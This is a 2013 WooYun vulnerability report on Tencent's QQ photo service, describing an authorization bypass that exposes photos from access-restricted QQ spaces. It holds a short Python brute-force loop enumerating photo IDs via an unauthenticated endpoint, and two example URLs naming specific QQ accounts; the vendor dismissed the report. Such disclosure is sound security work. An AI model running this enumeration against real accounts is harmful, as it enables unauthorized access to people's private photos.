当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021225

漏洞标题:获取无权限察看的QQ空间中的相片

相关厂商:腾讯

漏洞作者: voxdei

提交时间:2013-04-04 12:32

修复时间:2013-04-07 09:37

公开时间:2013-04-07 09:37

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-04: 细节已通知厂商并且等待厂商处理中
2013-04-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

即使用户空间/相册需要权限访问,仍可自由访问动感相册

详细说明:

patt = 'http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=%s&fid=%s'
errmsg = urllib2.urlopen(patt % (uin, '99999')).read()
data = dict()
for i in range(100000):
	fid=str(i).zfill(5)
	url = patt % (uin, fid)
	resp = urllib2.urlopen(url).read()
	if resp != errmsg:
		data[fid] = resp

漏洞证明:

随便给两个例子
http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=252838351&fid=13352
http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=446565247&fid=12873
空间都有访问权限,但通过以上网址可以获取照片

修复方案:

加入访问权限和验证码

版权声明:转载请注明来源 voxdei@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-07 09:37

厂商回复:

非常感谢您的报告。这个问题我们经过评估,暂未发现可以对用户或者业务产生影响,故不作处理。如果您对于该结论有任何的疑问,欢迎反馈指正,我们会有专人跟进处理。

漏洞Rank:3 (WooYun评价)

最新状态:

暂无